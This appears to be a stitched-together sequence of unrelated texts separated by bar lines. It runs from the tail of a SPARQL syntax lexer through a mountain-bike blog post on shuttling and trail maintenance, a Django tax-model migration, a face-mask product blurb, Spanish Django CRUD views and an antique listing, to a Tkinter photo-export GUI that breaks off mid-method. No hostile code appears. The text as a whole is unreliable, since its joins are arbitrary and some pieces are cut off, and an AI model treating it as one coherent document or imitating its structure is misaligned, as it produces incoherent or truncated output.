(r",|;|\.|\(|\)|\[|\]|\{|\}|\^\^", Punctuation),
("(%s)?\:(%s)?" % (PREFIX, NAME), Name.Tag),
(r"_\:%s" % NAME, Name.Variable),
(r"[\$\?]%s" % NAME, Name.Variable),
(r"<[^>]*>", Name.Constant),
(r"(['\"]).+\1", String.Double),
(r"\d+(\.\d*)?([eE][+\-]?\d+)?", Number),
(r"\.\d+([eE][+\-]?\d+)?", Number),
(r"\s+", Whitespace),
(r"true|false", Keyword.Constant),
(r"(?i)prefix|select|construct|ask|describe|where|from|as|graph|filter"
"|optional|a|union|not exists", Keyword.Reserved),
(r"(?i)distinct|reduced|group by|order by|limit|offset|asc|desc",
Keyword.Reserved),
(r"(?i)count|sum|avg|min|max|groupconcat|sample",
Keyword.Reserved),
(r"(?i)delete|insert|data|load|clear|create|drop|copy|move|add",
Keyword.Reserved),
(r"(?i)regex",
Keyword.Function),
(r"\+|-|\*|/|=|!|<|>|\&|\|", Punctuation),
(r".+", Error),
],
}
def setup(app):
# An instance of the lexer is required
sparqlLexer = SparqlLexer()
app.add_lexer('sparql', sparqlLexer)
|
First I must define pig as some have been taking exception to that phrase being used to describe their bike. Let it be known that pig is not meant to be derogatory, rather it's just easier to say pig than, big huge monster bike with over 5 inches of travel front and back. However, now I can see why downhillers/freeriders/anyone with a pig, gets very defensive when people mention their bikes.
Allow me to explain. Recently I decided to bite the bullet, and the bank account to buy a pig from Corsa Cycles. Let me tell you it was the best decision I've ever made. Dave, Troy and Easy helped me pick out the perfect bike and now with their fancy new digs in Squamish Station, they're always ready to step up to any scenario. However, there was one thing they didn't prepare me for. I wasn't prepared for the unanimous reaction from "the people" once I decided to hop on the plush bandwagon and become a member of the 5 & 5 club.
The people: "Oh, you're one of THOSE now."
The people: "A Shuttler. You know one of those lazy bastards who drive their bikes to the top of Diamond Head, rip up the trail then drive back to your North Van. home never once helping on a trail maintenance day."
Me: "Oh one of those."
Well how do you like them apples. It seems without even trying that I'm thrown bike first into another battle in Squamish. I'm just Thankful there's nary a woodchip to be seen. No, this battle is between the cardio freaks who bike up, and the lazy bastards who drive up. The main problem is that wording exactly. "Lazy bastards" It's assumed that shuttlers are in fact lazy and therefore never give back and maintain the trails. While this may be true in some circumstances, generally the car droppers I know all have their own trails, and they're first with the coffee and a safety meeting when a maintenance day is announced. But of course, like anything there are the bad apples who ruin the bunch.
Well, if not a solution, at least it's a step to recognizing the problem.
Do these shuttle tourists even know about maintenance days? Well they won't have that excuse for long now that you're armed with this!
Just print this page, photocopy the cupon like flyer and keep a couple copies in your camel pack. Then when you come upon a truck parked at the top of a grueling climb. Take a moment from your cursing of their gasoline guts, and politely place one of these informational flyers on their windshield.
If nothing else, it will give them one less excuse to not come out to a maintenance day.
So you've decided to shuttle.
First, apologies for resorting to a windshield flyer. But rest assured that this is not an offer to loose weight, learn a trade, or change religions.
It is however, an offer to close the ever widening gap between those that shuttle (AKA: car drop) and those that peddle their bikes up the hill.
Either way we're both lucky enough to enjoy some of the most incredible mountain bike trails around. Unfortunately, trails don't fix themselves.
It is here that a request be made.
Please, enjoy your day on our world class trails. Then a couple times a season, give a little back and get involved in a maintenance day.
WHERE & WHEN? Just phone one of the bike shops (Corsa, Tantalus) there are people fixing up the trails every day, and they would love some help.
Just help put it back when you're done.
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
dependencies = [
('contenttypes', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Tax',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=25)),
('created', models.DateTimeField(default=datetime.datetime.now, editable=False)),
('modified', models.DateTimeField(auto_now=True)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='LinearTax',
fields=[
('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
('percent', models.DecimalField(max_digits=6, decimal_places=3)),
],
options={
'abstract': False,
},
bases=('django_price.tax',),
),
migrations.CreateModel(
name='MultiTax',
fields=[
('tax_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='django_price.Tax')),
],
options={
'abstract': False,
},
bases=('django_price.tax',),
),
migrations.AddField(
model_name='tax',
name='_poly_ct',
field=models.ForeignKey(related_name='+', editable=False, to='contenttypes.ContentType'),
),
migrations.AddField(
model_name='multitax',
name='taxes',
field=models.ManyToManyField(related_name='+', to='django_price.Tax'),
),
]
|
Softening and moisturizing face mask for tired and dull skin. The highly absorbent properties of white clay it contains, combined with Dictamelia* and grapefruit extracts, cleanse the skin gently and deeply, removing the impurities that cause dullness. Moreover Licorice extract soothes and calms. The skin feels clarified, tonified and rejuvenated.
USAGE: Apply a rich layer on perfectly cleansed face and neck. Leave it for 10 minutes, rinse with lukewarm water and proceed with the tonic lotion.
Frequency: 1-2 times a week.
|
# -*- coding: UTF-8 -*-
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from meregistro.shortcuts import my_render
from apps.seguridad.decorators import login_required, credential_required
from django.core.paginator import Paginator
class CrudConfig:
def __init__(self, model_class, form_class, form_filter_class, template_dir):
self.model_class = model_class
self.form_class = form_class
self.form_filter_class = form_filter_class
self.template_dir = template_dir
from apps.registro.models import AutoridadCargo
from apps.registro.forms import AutoridadCargoForm, AutoridadCargoFormFilters
from apps.registro.models import Departamento
from apps.registro.forms import DepartamentoForm, DepartamentoFormFilters
from apps.registro.models import Localidad
from apps.registro.forms import LocalidadForm, LocalidadFormFilters
from apps.registro.models import Jurisdiccion
from apps.registro.forms import JurisdiccionForm, JurisdiccionFormFilters
from apps.registro.models import TipoGestion
from apps.registro.forms import TipoGestionForm, TipoGestionFormFilters
from apps.registro.models import TipoSubsidio
from apps.registro.forms import TipoSubsidioForm, TipoSubsidioFormFilters
from apps.registro.models import OrigenNorma
from apps.registro.forms import OrigenNormaForm, OrigenNormaFormFilters
from apps.registro.models import TipoNorma
from apps.registro.forms import TipoNormaForm, TipoNormaFormFilters
from apps.registro.models import TipoDomicilio
from apps.registro.forms import TipoDomicilioForm, TipoDomicilioFormFilters
from apps.registro.models import TipoCompartido
from apps.registro.forms import TipoCompartidoForm, TipoCompartidoFormFilters
from apps.registro.models import TipoConexion
from apps.registro.forms import TipoConexionForm, TipoConexionFormFilters
from apps.registro.models import TipoDependenciaFuncional
from apps.registro.forms import TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters
from apps.titulos.models import Carrera
from apps.titulos.forms import CarreraForm, CarreraFormFilters
from apps.titulos.models import TipoTitulo
from apps.titulos.forms import TipoTituloForm, TipoTituloFormFilters
cruds = {
'autoridad_cargo': CrudConfig(AutoridadCargo, AutoridadCargoForm, AutoridadCargoFormFilters, 'backend/autoridad_cargo/'),
'departamento': CrudConfig(Departamento, DepartamentoForm, DepartamentoFormFilters, 'backend/departamento/'),
'localidad': CrudConfig(Localidad, LocalidadForm, LocalidadFormFilters, 'backend/localidad/'),
'jurisdiccion': CrudConfig(Jurisdiccion, JurisdiccionForm, JurisdiccionFormFilters, 'backend/jurisdiccion/'),
'tipo_gestion': CrudConfig(TipoGestion, TipoGestionForm, TipoGestionFormFilters, 'backend/tipo_gestion/'),
'tipo_subsidio': CrudConfig(TipoSubsidio, TipoSubsidioForm, TipoSubsidioFormFilters, 'backend/tipo_subsidio/'),
'origen_norma': CrudConfig(OrigenNorma, OrigenNormaForm, OrigenNormaFormFilters, 'backend/origen_norma/'),
'tipo_norma': CrudConfig(TipoNorma, TipoNormaForm, TipoNormaFormFilters, 'backend/tipo_norma/'),
'tipo_domicilio': CrudConfig(TipoDomicilio, TipoDomicilioForm, TipoDomicilioFormFilters, 'backend/tipo_domicilio/'),
'tipo_compartido': CrudConfig(TipoCompartido, TipoCompartidoForm, TipoCompartidoFormFilters, 'backend/tipo_compartido/'),
'tipo_conexion': CrudConfig(TipoConexion, TipoConexionForm, TipoConexionFormFilters, 'backend/tipo_conexion/'),
'tipo_dependencia_funcional': CrudConfig(TipoDependenciaFuncional, TipoDependenciaFuncionalForm, TipoDependenciaFuncionalFormFilters, 'backend/tipo_dependencia_funcional/'),
'carrera': CrudConfig(Carrera, CarreraForm, CarreraFormFilters, 'backend/carrera/'),
'tipo_titulo': CrudConfig(TipoTitulo, TipoTituloForm, TipoTituloFormFilters, 'backend/tipo_titulo/'),
}
ITEMS_PER_PAGE = 50
@credential_required('seg_backend')
def index(request, crud_name):
config = cruds[crud_name]
if request.method == 'GET':
form_filter = config.form_filter_class(request.GET)
else:
form_filter = config.form_filter_class()
q = build_query(form_filter, 1)
paginator = Paginator(q, ITEMS_PER_PAGE)
try:
page_number = int(request.GET['page'])
except (KeyError, ValueError):
page_number = 1
if page_number < 1:
page_number = 1
elif page_number > paginator.num_pages:
page_number = paginator.num_pages
page = paginator.page(page_number)
objects = page.object_list
return my_render(request, config.template_dir + 'index.html', {
'form_filters': form_filter,
'objects': objects,
'paginator': paginator,
'page': page,
'page_number': page_number,
'pages_range': range(1, paginator.num_pages + 1),
'next_page': page_number + 1,
'prev_page': page_number - 1
})
def build_query(filters, page):
"""
Construye el query de búsqueda a partir de los filtros.
"""
return filters.buildQuery()
@credential_required('seg_backend')
def create(request, crud_name):
config = cruds[crud_name]
if request.method == 'POST':
form = config.form_class(request.POST)
if form.is_valid():
obj = form.save()
request.set_flash('success', 'Datos guardados correctamente.')
# redirigir a edit
return HttpResponseRedirect(reverse('crudEdit', args=[crud_name, obj.id]))
else:
request.set_flash('warning', 'Ocurrió un error guardando los datos.')
else:
form = config.form_class()
return my_render(request, config.template_dir + 'new.html', {
'form': form,
'is_new': True,
})
@credential_required('seg_backend')
def edit(request, crud_name, obj_id):
config = cruds[crud_name]
obj = config.model_class.objects.get(pk=obj_id)
if request.method == 'POST':
form = config.form_class(request.POST, instance=obj)
if form.is_valid():
obj = form.save()
request.set_flash('success', 'Datos actualizados correctamente.')
else:
request.set_flash('warning', 'Ocurrió un error actualizando los datos.')
else:
form = config.form_class(instance=obj)
return my_render(request, config.template_dir + 'edit.html', {
'form': form,
'obj': obj,
})
@credential_required('seg_backend')
def delete(request, crud_name, obj_id):
config = cruds[crud_name]
obj = config.model_class.objects.get(pk=obj_id)
try:
obj.delete()
request.set_flash('success', 'Registro eliminado correctamente.')
except Exception as e:
print e
request.set_flash('warning', 'No se puede eliminar el elemento porque está en uso.')
return HttpResponseRedirect(reverse('crudList', args=[crud_name]))
|
Three-part construction. Iron core. Original black paint. Unmarked. Nicely worn in good condition.
|
"""Reads iPhoto library info, and exports photos and movies. GUI version."""
# Copyright 2010 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import cStringIO
import logging
import os
import platform
import threading
import tkFileDialog
import tkMessageBox
import traceback
# pylint: disable-msg=W0614
from Tkinter import * #IGNORE:W0401
from ttk import *
import appledata.iphotodata as iphotodata
import phoshare.phoshare_main as phoshare_main
import phoshare.phoshare_version as phoshare_version
import tilutil.exiftool as exiftool
import tilutil.systemutils as su
from ScrolledText import ScrolledText
import ConfigParser
import Queue
_CONFIG_PATH = su.expand_home_folder('~/Library/Application Support/Google/'
'Phoshare/phoshare.cfg')
_BOLD_FONT = ('helvetica', 12, 'bold')
_logger = logging.getLogger('google')
def _int_from_bool(boolean_value):
"""Converts a boolean value to an integer of 0 or 1."""
if boolean_value:
return 1
return 0
class HelpDialog(Toplevel):
"""Displays a help dialog, using a scrolled text area."""
def __init__(self, parent, text, title="Phoshare Help"):
Toplevel.__init__(self, parent)
self.transient(parent)
self.title(title)
self.parent = parent
t = ScrolledText(self)
t.insert(END, text)
t.config(state=DISABLED)
t.pack()
class ExportApp(Frame):
"""GUI version of the Phoshare tool."""
def __init__(self, master=None):
"""Initialize the app, setting up the UI."""
Frame.__init__(self, master, padding=10)
top = self.winfo_toplevel()
menu_bar = Menu(top)
top["menu"] = menu_bar
apple = Menu(menu_bar, name='apple')
menu_bar.add_cascade(label='Phoshare', menu=apple)
apple.add_command(label="About Phoshare", command=self.__aboutHandler)
sub_menu = Menu(menu_bar, name='help')
menu_bar.add_cascade(label="Help", menu=sub_menu)
sub_menu.add_command(label="Phoshare Help", command=self.help_buttons)
self.thread_queue = Queue.Queue(maxsize=100)
self.active_library = None
top.columnconfigure(0, weight=1)
top.rowconfigure(0, weight=1)
self.grid(sticky=N+S+E+W)
self.valid_library = False
self.exiftool = False
self.iphoto_library = StringVar()
self.iphoto_library_status = StringVar()
self.browse_library_button = None
self.export_folder = StringVar()
self.library_status = None
self.dryrun_button = None
self.export_button = None
self.text = None
self.events = StringVar()
self.albums = StringVar()
self.smarts = StringVar()
self.foldertemplate = StringVar()
self.nametemplate = StringVar()
self.captiontemplate = StringVar()
self.update_var = IntVar()
self.delete_var = IntVar()
self.originals_var = IntVar()
self.link_var = IntVar()
self.folder_hints_var = IntVar()
self.faces_box = None
self.faces_var = IntVar()
self.face_keywords_box = None
self.face_keywords_var = IntVar()
self.face_albums_var = IntVar()
self.face_albums_text = StringVar()
self.iptc_box = None
self.iptc_all_box = None
self.iptc_var = IntVar()
self.iptc_all_var = IntVar()
self.gps_box = None
self.gps_var = IntVar()
self.verbose_var = IntVar()
self.info_icon = PhotoImage(file="info-b16.gif")
self.create_widgets()
# Set up logging so it gets redirected to the text area in the app.
self.logging_handler = logging.StreamHandler(self)
self.logging_handler.setLevel(logging.WARN)
_logger.addHandler(self.logging_handler)
def __aboutHandler(self):
HelpDialog(self, """%s %s
Copyright 2010 Google Inc.
http://code.google.com/p/phoshare""" % (phoshare_version.PHOSHARE_VERSION,
phoshare_version.PHOSHARE_BUILD),
title="About Phoshare")
def init(self):
"""Initializes processing by launching background thread checker and
initial iPhoto library check."""
self.thread_checker()
if exiftool.check_exif_tool(sys.stdout):
self.exiftool = True
self.faces_box.configure(state=NORMAL)
self.face_keywords_box.configure(state=NORMAL)
self.iptc_box.configure(state=NORMAL)
self.iptc_all_box.configure(state=NORMAL)
self.gps_box.configure(state=NORMAL)
options = self.Options()
options.load()
self.init_from_options(options)
self.check_iphoto_library()
def init_from_options(self, options):
"""Populates the UI from options."""
self.iphoto_library.set(options.iphoto)
self.export_folder.set(options.export)
self.albums.set(su.fsdec(options.albums))
self.events.set(su.fsdec(options.events))
self.smarts.set(su.fsdec(options.smarts))
self.foldertemplate.set(su.unicode_string(options.foldertemplate))
self.nametemplate.set(su.unicode_string(options.nametemplate))
self.captiontemplate.set(su.unicode_string(options.captiontemplate))
self.update_var.set(_int_from_bool(options.update))
self.delete_var.set(_int_from_bool(options.delete))
self.originals_var.set(_int_from_bool(options.originals))
self.link_var.set(_int_from_bool(options.link))
self.folder_hints_var.set(_int_from_bool(options.folderhints))
self.faces_var.set(_int_from_bool(options.faces) and self.exiftool)
self.face_keywords_var.set(_int_from_bool(options.face_keywords) and
self.exiftool)
self.face_albums_var.set(_int_from_bool(options.facealbums))
self.face_albums_text.set(options.facealbum_prefix)
if options.iptc and self.exiftool:
self.iptc_var.set(1)
if options.iptc == 2:
self.iptc_all_var.set(1)
self.gps_var.set(_int_from_bool(options.gps) and self.exiftool)
def _add_section(self, container, text, help_command):
"""Adds a new UI section with a bold label and an info button.
Args:
container: UI element that will contain this new item
row: row number in grid. Uses two rows.
text: label frame text.
help_command: command to run when the info button is pressed.
Returns: tuple of new section and content frames.
"""
section_frame = Frame(container)
section_frame.columnconfigure(0, weight=1)
label = Label(section_frame, text=text)
label.config(font=_BOLD_FONT)
label.grid(row=0, column=0, sticky=W, pady=5)
Button(section_frame, image=self.info_icon,
command=help_command).grid(row=0, column=1, sticky=E)
content_frame = Frame(section_frame)
content_frame.grid(row= 1, column=0, columnspan=2, sticky=N+S+E+W, pady=5)
return (section_frame, content_frame)
def _create_button_bar(self, container, row):
"""Creates the button bar with the Dry Run and Export buttons.
Args:
row: row number in grid.
Returns: next row number in grid.
"""
button_bar = Frame(container)
button_bar.grid(row=row, column=0, sticky=E+W, padx=10)
button_bar.columnconfigure(0, weight=1)
verbose_box = Checkbutton(button_bar, text="Show debug output", var=self.verbose_var)
verbose_box.grid(row=0, column=0, sticky=E)
self.dryrun_button = Button(button_bar, text="Dry Run",
command=self.do_dryrun, state=DISABLED)
self.dryrun_button.grid(row=0, column=1, sticky=E, pady=5)
self.export_button = Button(button_bar, text="Export",
command=self.do_export, state=DISABLED)
self.export_button.grid(row=0, column=2, pady=5)
return row + 1
def _create_library_tab(self, library_tab):
library_tab.columnconfigure(0, weight=1)
row = 0
f = Frame(library_tab)
f.grid(row=row, columnspan=2, stick=E+W, padx=5, pady=5)
row += 1
f.columnconfigure(1, weight=1)
Label(f, text="iPhoto Library:").grid(sticky=E)
iphoto_library_entry = Entry(f, textvariable=self.iphoto_library)
iphoto_library_entry.grid(row=0, column=1, sticky=E+W)
self.browse_library_button = Button(f, text="Browse...",
command=self.browse_library)
self.browse_library_button.grid(row=0, column=2)
self.library_status = Label(f, textvariable=self.iphoto_library_status)
self.library_status.grid(row=1, column=1, sticky=W)
(cf, lf) = self._add_section(library_tab, "Events, Albums and Smart Albums",
self.help_events)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
Label(lf, text="Events:").grid(sticky=E)
events_entry = Entry(lf, textvariable=self.events)
events_entry.grid(row=0, column=1, sticky=EW)
Label(lf, text="Albums:").grid(sticky=E)
albums_entry = Entry(lf, textvariable=self.albums)
albums_entry.grid(row=1, column=1, sticky=EW)
Label(lf, text="Smart Albums:").grid(sticky=E)
smarts_entry = Entry(lf, textvariable=self.smarts)
smarts_entry.grid(row=2, column=1, columnspan=3, sticky=EW)
def _create_files_tab(self, files_tab):
files_tab.columnconfigure(0, weight=1)
# Export folder and options
row = 0
(cf, lf) = self._add_section(files_tab, "Export Folder and Options", self.help_export)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
label = Label(lf, text="Export Folder:")
label.grid(sticky=E)
export_folder_entry = Entry(lf, textvariable=self.export_folder)
export_folder_entry.grid(row=0, column=1, columnspan=2, sticky=E+W)
Button(lf, text="Browse...",
command=self.browse_export).grid(row=0, column=3)
update_box = Checkbutton(lf, text="Overwrite changed pictures",
var=self.update_var)
update_box.grid(row=1, column=1, sticky=W)
originals_box = Checkbutton(lf, text="Export originals",
var=self.originals_var)
originals_box.grid(row=2, column=1, sticky=W)
hint_box = Checkbutton(lf, text="Use folder hints",
var=self.folder_hints_var)
hint_box.grid(row=3, column=1, sticky=W)
delete_box = Checkbutton(lf, text="Delete obsolete pictures",
var=self.delete_var)
delete_box.grid(row=4, column=1, sticky=W)
link_box = Checkbutton(lf, text="Use file links", var=self.link_var)
link_box.grid(row=5, column=1, sticky=W)
# Templates ----------------------------------------
(cf, lf) = self._add_section(files_tab, "Name Templates", self.help_templates)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(1, weight=1)
Label(lf, text="Folder names:").grid(sticky=E)
foldertemplate_entry = Entry(lf, textvariable=self.foldertemplate)
foldertemplate_entry.grid(row=0, column=1, sticky=EW)
Label(lf, text="File names:").grid(sticky=E)
nametemplate_entry = Entry(lf, textvariable=self.nametemplate)
nametemplate_entry.grid(row=1, column=1, sticky=EW)
Label(lf, text="Captions:").grid(sticky=E)
captiontemplate_entry = Entry(lf, textvariable=self.captiontemplate)
captiontemplate_entry.grid(row=2, column=1, sticky=EW)
def _create_metadata_tab(self, metadata_tab):
metadata_tab.columnconfigure(0, weight=1)
row = 0
# Metadata --------------------------------------------
(cf, lf) = self._add_section(metadata_tab, "Metadata", self.help_metadata)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
self.iptc_box = Checkbutton(lf,
text=("Export metadata (descriptions, "
"keywords, ratings, dates)"),
var=self.iptc_var, state=DISABLED,
command=self.change_iptc_box)
self.iptc_box.grid(row=0, column=0, columnspan=2, sticky=W)
self.iptc_all_box = Checkbutton(lf,
text="Check previously exported images",
var=self.iptc_all_var,
command=self.change_metadata_box,
state=DISABLED)
self.iptc_all_box.grid(row=1, column=0, sticky=W)
self.gps_box = Checkbutton(lf,
text="Export GPS data",
var=self.gps_var,
command=self.change_metadata_box,
state=DISABLED)
self.gps_box.grid(row=2, column=0, sticky=W)
# Faces ---------------------------------------------------
(cf, lf) = self._add_section(metadata_tab, "Faces", self.help_faces)
cf.grid(row=row, columnspan=2, stick=E+W)
row += 1
lf.columnconfigure(2, weight=1)
self.faces_box = Checkbutton(lf, text="Copy faces into metadata",
var=self.faces_var, state=DISABLED,
command=self.change_metadata_box)
self.faces_box.grid(row=0, column=0, sticky=W)
self.face_keywords_box = Checkbutton(
lf,
text="Copy face names into keywords",
var=self.face_keywords_var,
command=self.change_metadata_box,
state=DISABLED)
self.face_keywords_box.grid(row=1, column=0, sticky=W)
checkbutton = Checkbutton(lf, text="Export faces into folders",
var=self.face_albums_var)
checkbutton.grid(row=2, column=0, sticky=W)
label = Label(lf, text="Faces folder prefix:")
label.grid(row=2, column=1, sticky=E)
entry = Entry(lf, textvariable=self.face_albums_text)
entry.grid(row=2, column=2, sticky=E+W)
def create_widgets(self):
"""Builds the UI."""
self.columnconfigure(0, weight=1)
n = Notebook(self)
n.grid(row=0, sticky=E+W+N+S)
library_tab = Frame(n)
n.add(library_tab, text='Library')
self._create_library_tab(library_tab)
files_tab = Frame(n)
n.add(files_tab, text='Files')
self._create_files_tab(files_tab)
metadata_tab = Frame(n)
n.add(metadata_tab, text='Metadata')
self._create_metadata_tab(metadata_tab)
self._create_button_bar(self, 1)
self.text = ScrolledText(self, borderwidth=4, relief=RIDGE, padx=4,
pady=4)
self.text.grid(row=2, column=0, sticky=E+W+N+S)
self.rowconfigure(2, weight=1)
def change_iptc_box(self):
"""Clears some options that depend on the metadata export option."""
mode = self.iptc_var.get()
if not mode:
self.faces_var.set(0)
self.face_keywords_var.set(0)
self.iptc_all_var.set(0)
self.gps_var.set(0)
def change_metadata_box(self):
"""Sets connected options if an option that needs meta data is changed.
"""
mode = (self.faces_var.get() or self.face_keywords_var.get() or
self.iptc_all_var.get() or self.gps_var.get())
if mode:
self.iptc_var.set(1)
def help_events(self):
HelpDialog(self, """Events, Albums and Smart Albums
Selects which events, albums, or smart albums to export.
Each field is a regular expression, and at least one must be filled in.
Matches are done against the beginning of the event or album name. An
entry in Events of
Family
will export all events that start with "Family", including "Family 2008"
and "Family 2009". "|" separates alternate patterns, so
Family|Travel
will export all events that start with either "Family" or "Travel".
"." matches any character, and therefore,
.
will export all events. To export all events with "2008" in the name, use
.*2008
For more details on regular expressions, see
http://en.wikipedia.org/wiki/Regular_expression""")
def help_templates(self):
HelpDialog(self, """Folder, file, and image caption templates.
Templates are strings with place holders for values. The place holders have
the format "{name}". Everything else in the template will be copied. Examples:
{title}
{yyyy}/{mm}/{dd} {title} - generates "2010/12/31 My Birthday" if the date
of the pictures is Dec 31, 2010, and the title is "My Birthday".
{yyyy} Event: {event} - generates "2010 Event: Birthday" for an event with
any date in 2010 and the name "Birthday".
Available place holders for folder names:
{name} - name of the album or event.
{hint} - folder hint (taken from line event or album description starting with
@).
{yyyy} - year of album or event date.
{mm} - month of album or event date.
{dd} - date of album or event date.
Available place holders for file names:
{album} - name of album (or in the case of an event, the name of the event).
{index} - number of image in album, starting at 1.
{index0} - number of image in album, padded with 0s, so that all numbers have
the same length.
{event} - name of the event. In the case of an album, the name of the event
to which the image belongs.
{event_index} - number of image in the event, starting at 1. If the case of an
album, this number will be based on the event to which the
image belongs.
{event_index0} - same as {event_index}, but padded with leading 0s so that all
values have the same length.
{title} - image title.
{yyyy} - year of image.
{mm} - month of image (01 - 12).
{dd} - day of image (01 - 31).
If you are using {album}/{index}/{index0} place holders, the image will be
named based on whatever album or event it is contained. That means an image
in two albums will be exported with different names, even so the files are
identical. If you want to use the same name for each image, regardless of
which album it is in, use {event}, {event_index}, and {event_index0} instead.
Available place holders for captions:
{title} - image title.
{description} - image description.
{title_description} - concatenated image title and description, separated by a
: if both are set.
{yyyy} - year of image.
{mm} - month of image (01 - 12).
{dd} - day of image (01 - 31).
""")
def help_buttons(self):
HelpDialog(self, """Export modes.
Click on "Dry Run" to see what Phoshare would do without actually modifying any
files.
Click on "Export" to export your files using the current settings.
All your settings will be saved when you click either Dry Run and Export, and
re-loaded if you restart Phoshare.
Check "Show debug output" to generate additional output message that can assist
in debugging Phoshare problems.
""")
def help_export(self):
HelpDialog(self, """Export Settings
Export Folder: path to the folder for exporting images.
Overwrite changed pictures: If set, pictures that already exist in the export
folder will be overriden if an different version
exist in iPhoto. Any edits made to previously
exported images in the export folder will be lost!
Use Dry Run to see which files would be overwritten.
Export originals: If set, and an image has been modified in iPhoto, both the
original and the edited version will be exported. The original
will be stored in a sub-folder called "Originals".
Use folder hints: By default, each exported event or album will become a folder
in the export folder. With folder hints, a sub-folder name can
be given in the event or album description by adding a line
starting with a @ character. Example:
Family Vacation
@Vacation
would export all images in that event into a sub-folder called
"Vacation".
Delete obsolete pictures: If set, any image, movie file or folder in the export
folder that does not exist in the iPhoto library will
be deleted. Use Dry Run to see which files would be
deleted.
Use file links: Don't copy images during export, but make a link to the files
in the iPhoto library instead. This option is only available
if the export folder is on the same drive as the iPhoto library.
This option will save a lot of disk space because it avoids
making copies of all your images and videos. Using this option
causes the metadata of the images IN YOUR IPHOTO LIBRARY to be
modified. While phoshare should not cause any problems to your
images, it is best to use this option only if you have a backup
of your iPhoto library, and you know how to restore your library
from the backup. For more details on link mode, see
https://sites.google.com/site/phosharedoc/Home#TOC-link-mode""")
def help_faces(self):
HelpDialog(self, """Faces options.
Copy faces into metadata: faces tags and face regions will be copied into the
image metadata using the Microsoft Photo Region
Schema:
http://msdn.microsoft.com/en-us/library/ee719905(VS.85).aspx
Copy faces names into keywords: If set, face names will be merged into image
keywords. Requires "Export metadata" checked.
Export faces into folders: If checked, folders will be created for each face
tag, each containing all the images tagged with
that person.
Faces folder prefix: If set, the string will be used as a prefix for the
face export folders if "Exported faces into folders"
is checked. This can be just a value like "Face: ", or
a sub-folder name like "Faces/" if it ends with a "/"
Metadata options will be disabled if exiftool is not available.
""")
def help_metadata(self):
HelpDialog(self, """Metadata options.
Export metadata: sets the description, keywords, rating and date metadata in the
exported images to match the iPhoto settings.
Check previously exported images: If not checked, metadata will only be set for new or
updated images. If checked, metadata will be checked in
all images, including ones that were previously
exported. This is much slower.
Export GPS data: export the GPS coordinates into the image metadata.
Metadata options will be disabled if exiftool is not available.""")
def check_iphoto_library(self):
self.valid_library = False
self.enable_buttons()
self.iphoto_library_status.set("Checking library location...")
self.launch_export("library")
def set_library_status(self, good, message):
if good:
self.valid_library = True
self.enable_buttons()
self.iphoto_library_status.set(message)
def write_progress(self, text):
self.text.insert(END, text)
self.text.see(END)
def enable_buttons(self):
if self.valid_library:
self.dryrun_button.config(state=NORMAL)
self.export_button.config(state=NORMAL)
else:
self.dryrun_button.config(state=DISABLED)
self.export_button.config(state=DISABLED)
self.browse_library_button.config(state=NORMAL)
def browse_library(self):
path = tkFileDialog.askopenfilename(title="Locate iPhoto Library")
self.iphoto_library.set(path)
self.check_iphoto_library()
def browse_export(self):
path = tkFileDialog.askdirectory(title="Locate Export Folder")
self.export_folder.set(path)
def do_export(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.export_button.config(text="Stop Export")
self.dryrun_button.config(state=DISABLED)
self.run_export(False)
def do_dryrun(self):
if self.active_library:
self.stop_thread()
return
if not self.can_export():
return
self.dryrun_button.config(text="Stop Dry Run")
self.export_button.config(state=DISABLED)
self.run_export(True)
def stop_thread(self):
if self.active_library:
self.active_library.abort()
def export_done(self):
self.active_library = None
self.dryrun_button.config(text="Dry Run")
self.export_button.config(text="Export")
self.enable_buttons()
class Options(object):
"""Simple helper to create an object compatible with the OptionParser
output in Phoshare.py."""
def __init__(self):
self.iphoto = '~/Pictures/iPhoto Library'
self.export = '~/Pictures/Album'
self.albums = ''
self.events = '.'
self.smarts = ''
self.ignore = []
self.delete = False
self.update = False
self.link = False
self.dryrun = False
self.folderhints = False
self.captiontemplate = u'{description}'
self.foldertemplate = u'{name}'
self.nametemplate = u'{title}'
self.aperture = False # TODO
self.size = '' # TODO
self.picasa = False # TODO
self.movies = True # TODO
self.originals = False
self.iptc = 0
self.gps = False
self.faces = False
self.facealbums = False
self.facealbum_prefix = ''
self.face_keywords = False
self.verbose = False
def load(self):
"""Attempts to load saved options. Returns True if saved options
were available."""
if not os.path.exists(_CONFIG_PATH):
return False
config = ConfigParser.SafeConfigParser()
config.read(_CONFIG_PATH)
s = 'Export1'
if config.has_option(s, 'iphoto'):
self.iphoto = config.get(s, 'iphoto')
if config.has_option(s, 'export'):
self.export = config.get(s, 'export')
if config.has_option(s, 'albums'):
self.albums = config.get(s, 'albums')
if config.has_option(s, 'events'):
self.events = config.get(s, 'events')
if config.has_option(s, 'smarts'):
self.smarts = config.get(s, 'smarts')
if config.has_option(s, 'foldertemplate'):
self.foldertemplate = config.get(s, 'foldertemplate')
if config.has_option(s, 'nametemplate'):
self.nametemplate = config.get(s, 'nametemplate')
if config.has_option(s, 'captiontemplate'):
self.captiontemplate = config.get(s, 'captiontemplate')
if config.has_option(s, 'delete'):
self.delete = config.getboolean(s, 'delete')
if config.has_option(s, 'update'):
self.update = config.getboolean(s, 'update')
if config.has_option(s, 'link'):
self.link = config.getboolean(s, 'link')
